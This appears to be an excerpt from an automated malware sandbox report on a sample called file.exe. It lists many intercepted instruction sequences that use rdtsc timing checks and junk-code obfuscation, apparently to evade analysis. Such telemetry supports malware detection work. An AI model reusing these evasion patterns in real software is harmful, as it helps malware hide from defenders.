      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630441 second address: 63047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a jbe 00007FC7C474F645h 0x00000010 jmp 00007FC7C474F63Fh 0x00000015 clc 0x00000016 push 00000000h 0x00000018 mov si, D6B0h 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e push edi 0x0000001f jmp 00007FC7C474F63Bh 0x00000024 pop edi 0x00000025 push eax 0x00000026 push edx 0x00000027 push edi 0x00000028 pop edi 0x00000029 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6351E1 second address: 63527C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC7C5219A61h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC7C5219A64h 0x00000016 nop 0x00000017 clc 0x00000018 jg 00007FC7C5219A57h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FC7C5219A58h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov dword ptr [ebp+12455EC0h], esi 0x00000040 and di, 46E9h 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edi 0x0000004a call 00007FC7C5219A58h 0x0000004f pop edi 0x00000050 mov dword ptr [esp+04h], edi 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc edi 0x0000005d push edi 0x0000005e ret 0x0000005f pop edi 0x00000060 ret 0x00000061 mov dword ptr [ebp+12455BE7h], ecx 0x00000067 mov edi, 41BF9FE4h 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 pushad 0x00000071 popad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63184E second address: 631854 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63527C second address: 635281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63709B second address: 6370A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6381DD second address: 6381F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC7C5219A56h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6381F0 second address: 6381F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6381F4 second address: 6381FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1BA second address: 63A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007FC7C474F638h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 jno 00007FC7C474F63Ch 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D298Ch], eax 0x0000002e push 00000000h 0x00000030 mov di, bx 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d ja 00007FC7C474F636h 0x00000043 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A207 second address: 63A227 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7C5219A62h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633194 second address: 633198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B0DD second address: 63B0E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B0E1 second address: 63B0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B0EA second address: 63B168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FC7C5219A65h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FC7C5219A58h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+122D2BCEh] 0x0000002f push 00000000h 0x00000031 sub dword ptr [ebp+122D3728h], esi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007FC7C5219A58h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov di, dx 0x00000056 cld 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b jbe 00007FC7C5219A56h 0x00000061 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6342B8 second address: 6342CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FC7C474F63Ch 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C0B0 second address: 63C0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A64h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C0CD second address: 63C0D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6362CB second address: 636347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FC7C5219A61h 0x0000000e ja 00007FC7C5219A5Ch 0x00000014 push dword ptr fs:[00000000h] 0x0000001b xor dword ptr [ebp+122D1AF0h], esi 0x00000021 stc 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov ebx, dword ptr [ebp+122D19B4h] 0x0000002f mov eax, dword ptr [ebp+122D1735h] 0x00000035 mov ebx, eax 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007FC7C5219A58h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 and edi, dword ptr [ebp+122D2B96h] 0x00000059 nop 0x0000005a push ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D111 second address: 63D127 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636347 second address: 63634B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638365 second address: 6383E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FC7C474F643h 0x00000011 popad 0x00000012 jnl 00007FC7C474F63Ch 0x00000018 popad 0x00000019 nop 0x0000001a mov edi, 620F4A43h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007FC7C474F638h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov eax, dword ptr [ebp+122D0BBDh] 0x0000004d and di, 6604h 0x00000052 push FFFFFFFFh 0x00000054 mov edi, dword ptr [ebp+122D2BCEh] 0x0000005a mov bh, 7Fh 0x0000005c nop 0x0000005d pushad 0x0000005e je 00007FC7C474F63Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6383E9 second address: 638406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC7C5219A62h 0x0000000a jmp 00007FC7C5219A5Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638406 second address: 63840A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63840A second address: 63840E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63939F second address: 6393A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6393A3 second address: 6393A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6438CC second address: 64395F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2B8Ah] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FC7C474F638h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+122D2B1Ah] 0x00000033 mov bx, dx 0x00000036 jmp 00007FC7C474F647h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007FC7C474F638h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000016h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 mov bx, 4467h 0x0000005b push eax 0x0000005c add bx, E517h 0x00000061 pop edi 0x00000062 push eax 0x00000063 pushad 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2E5 second address: 63B2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 jns 00007FC7C5219A5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2FD second address: 63B39F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D2C56h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FC7C474F638h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007FC7C474F638h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 call 00007FC7C474F641h 0x00000055 pop ebx 0x00000056 jmp 00007FC7C474F649h 0x0000005b mov eax, dword ptr [ebp+122D1389h] 0x00000061 mov ebx, dword ptr [ebp+12450D9Fh] 0x00000067 push FFFFFFFFh 0x00000069 mov dword ptr [ebp+124567A4h], esi 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 pop eax 0x00000076 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B39F second address: 63B3A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B3A3 second address: 63B3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D358 second address: 63D35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D35D second address: 63D364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D364 second address: 63D376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FC7C5219A5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D376 second address: 63D37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D37A second address: 63D380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D380 second address: 63D40B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D3989h], edx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FC7C474F638h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 pushad 0x00000031 xor dword ptr [ebp+12450913h], edx 0x00000037 js 00007FC7C474F645h 0x0000003d call 00007FC7C474F63Eh 0x00000042 pop edx 0x00000043 popad 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov eax, dword ptr [ebp+122D15BDh] 0x00000051 mov dword ptr [ebp+1245BC6Eh], esi 0x00000057 push FFFFFFFFh 0x00000059 cmc 0x0000005a jnp 00007FC7C474F649h 0x00000060 push edx 0x00000061 jmp 00007FC7C474F641h 0x00000066 pop edi 0x00000067 nop 0x00000068 pushad 0x00000069 push ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D40B second address: 63D42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7C5219A63h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D42B second address: 63D435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E30D second address: 63E39A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FC7C5219A5Bh 0x00000010 nop 0x00000011 sub bx, 7B54h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov ebx, dword ptr [ebp+122D2D7Ah] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FC7C5219A58h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 mov dword ptr [ebp+1245BC7Ch], eax 0x0000004a mov dword ptr [ebp+122D31A8h], edx 0x00000050 mov eax, dword ptr [ebp+122D0BB5h] 0x00000056 push FFFFFFFFh 0x00000058 nop 0x00000059 jmp 00007FC7C5219A5Fh 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jnl 00007FC7C5219A58h 0x00000067 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F252 second address: 63F256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F256 second address: 63F2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FC7C5219A58h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 push dword ptr fs:[00000000h] 0x0000002a mov ebx, 27893DB6h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 call 00007FC7C5219A5Fh 0x0000003b stc 0x0000003c pop edi 0x0000003d mov eax, dword ptr [ebp+122D0DA1h] 0x00000043 mov dword ptr [ebp+122D31EFh], eax 0x00000049 push FFFFFFFFh 0x0000004b push 00000000h 0x0000004d push ebp 0x0000004e call 00007FC7C5219A58h 0x00000053 pop ebp 0x00000054 mov dword ptr [esp+04h], ebp 0x00000058 add dword ptr [esp+04h], 00000018h 0x00000060 inc ebp 0x00000061 push ebp 0x00000062 ret 0x00000063 pop ebp 0x00000064 ret 0x00000065 pushad 0x00000066 mov bx, B7B8h 0x0000006a or dword ptr [ebp+12466570h], eax 0x00000070 popad 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F2E4 second address: 63F2EE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6429D2 second address: 6429E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BE5D second address: 64BE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC7C474F636h 0x0000000a popad 0x0000000b jmp 00007FC7C474F641h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BE7F second address: 64BE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BE83 second address: 64BE87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B609 second address: 64B614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B614 second address: 64B61E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7C474F63Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B8CA second address: 64B8F4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FC7C5219A5Eh 0x00000010 ja 00007FC7C5219A58h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jo 00007FC7C5219A5Eh 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BA41 second address: 64BA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BA49 second address: 64BA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BA4E second address: 64BA60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BA60 second address: 64BA66 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651AAF second address: 651AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651AB5 second address: 651AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653BA2 second address: 653BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7C474F641h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653BBF second address: 653BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A62h 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653BD6 second address: 653BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 653BDE second address: 653BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007FC7C5219A56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659033 second address: 659037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658318 second address: 65831E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65831E second address: 65833C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F640h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FC7C474F636h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6585FC second address: 65860D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007FC7C5219A5Ch 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65860D second address: 658612 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6588D3 second address: 6588D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 658A26 second address: 658A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
